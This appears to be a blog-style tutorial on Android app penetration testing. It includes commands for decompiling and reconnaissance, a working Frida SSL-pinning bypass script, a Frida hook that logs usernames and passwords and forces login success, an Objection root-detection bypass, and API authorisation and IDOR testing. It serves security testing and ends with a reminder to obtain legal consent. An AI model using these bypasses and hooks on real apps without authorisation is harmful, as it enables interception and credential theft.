Mobile apps are omnipresent—from social media and enterprise to payment wallets. But most are still open to attack. This handbook is your step-by-step tutorial on pentesting mobile apps in 2025 with code snippets, tool instructions, and advice.
Tools Setup
Below is a quick Android (Linux/macOS) setup:
# Install ADB (Android Debug Bridge)
sudo apt install android-tools-adb
# Install MobSF (in a virtual environment)
git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
./setup.sh
To decompile an Android APK:
# Use JADX
jadx openexploit.apk -d outputfolder
# Use APKTool
apktool d openexploit.apk -o decompiled
To capture HTTPS traffic (make sure Burp Suite is installed)
Prefer watching instead of reading? Here’s a quick video guide
Information Gathering
Simple reconnaissance on an APK file:
# Show APK permissions
aapt dump permissions openexploit.apk
# Analyze the manifest
unzip -p openexploit.apk AndroidManifest.xml
Check for:
- android:debuggable="true"
- Exported activities, services, and receivers.
Static Analysis
Decompile and read the source code for hardcoded secrets:
# Using JADX
jadx-gui openexploit.apk
Look for:
String apiKey = "openexploit_api_key";
Scan res/values/strings.xml, assets/, and .so native libraries for secrets.
Dynamic Analysis
Intercept API calls:
Use Burp Suite and manipulate app traffic. Set your proxy and monitor requests. Look for JWTs, session cookies, API parameters.
Bypass SSL Pinning using Frida:
# Android SSL pinning bypass (Frida script)
frida -U -n com.target.openexploit -l frida-ssl-bypass.js
Sample code snippet of frida-ssl-bypass.js:
Java.perform(function () {
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
var SSLContext = Java.use('javax.net.ssl.SSLContext');
var TrustManager = Java.registerClass({
name: 'org.wooyun.TrustManager',
implements: [X509TrustManager],
methods: {
checkClientTrusted: function () {},
checkServerTrusted: function () {},
getAcceptedIssuers: function () { return []; }
}
});
var TrustManagers = [TrustManager.$new()];
var SSLContextInit = SSLContext.init;
SSLContext.init.implementation = function (keyManager, trustManager, secureRandom) {
SSLContextInit.call(this, keyManager, TrustManagers, secureRandom);
};
});
API Testing
Utilize Burp Suite to fuzz and test API security.
Bypass authentication:
POST /api/user/profile HTTP/1.2
Host: www.openexploit.in
Authorization: Bearer [XXXX-XXXX-XXXX-XXXX]
- Try expired authentication tokens
- Remove token and validate if the endpoint still works
- Try Insure Direct Object Reference(changind IDs)
Use Curl for API testing:
curl -X GET https://api.openexploit.in/user/123 \
-H "Authorization: Bearer authtoken-xxx-xx-xxx-xxx"
See if you are able to:
- View other user data
- Change roles
- Initiate admin endpoints
Local Data Storage Analysis
Pull data from Android emulator/device:
# List app packages
adb shell pm list packages
# Pull openexploit app data (only if rooted)
adb root
adb shell
cd /data/data/com.target.openexploit/
Check these:
-
shared_prefs/ – does any.xml contain credentials?
-
databases/ – dump SQLite DBs using sqlite3:
sqlite3 openexploit.db sqlite> .tables sqlite> SELECT * FROM users;
Reverse Engineering and Code Injection
Inject into runtime using Frida + Objection.
# Install Objection
pip install objection
# Bypass root detection
objection -g com.target.openexploit explore
# Inside the shell
android root disable
Hooking methods using Frida:
Java.perform(function () {
var Login = Java.use("com.app.login.LoginActivity");
Login.checkCredentials.implementation = function (user, pass) {
console.log("User: " + user + ", Pass: " + pass);
return true; // force login success
};
});
Reporting
Write an organized report in OWASP MASVS standards. Here is a sample report format:
Title: Hardcoded API Key in Source Code
Risk: High
Affected Component: openexploit.apk > MainActivity.java
Proof: String apiKey = "XXXX-XXXX-XXXX-XXXX";
Impact: Exposed API key can permit unauthorized API calls.
Recommendation: Place API keys in a secure backend. Never store secrets in app code.
You can use tools such as Dradis or Faraday to document findings.
Mobile Common Vulnerabilities
- Insecure Storage
- SSL Pinning
- API Authentication
- Exported Components
- Hardcoded Secrets
- Debuggable Builds
- Code Injection
Resource Reference
- OWASP MASVS & MSTG
- Frida
- Mobile Security Testing Guide GitHub
- Android Pentesting Cheat Sheet
- TryHackMe
Conclusion
Mobile app pentesting in 2025 is an most demanding skill for ethical hackers and security engineers. As digital identity moves towards mobile-based, AI-empowered apps, and sophisticated APIs, finding weaknesses is more critical than ever before.
Begin small. Practice testing test apps. And always have legal consent prior to testing live apps.
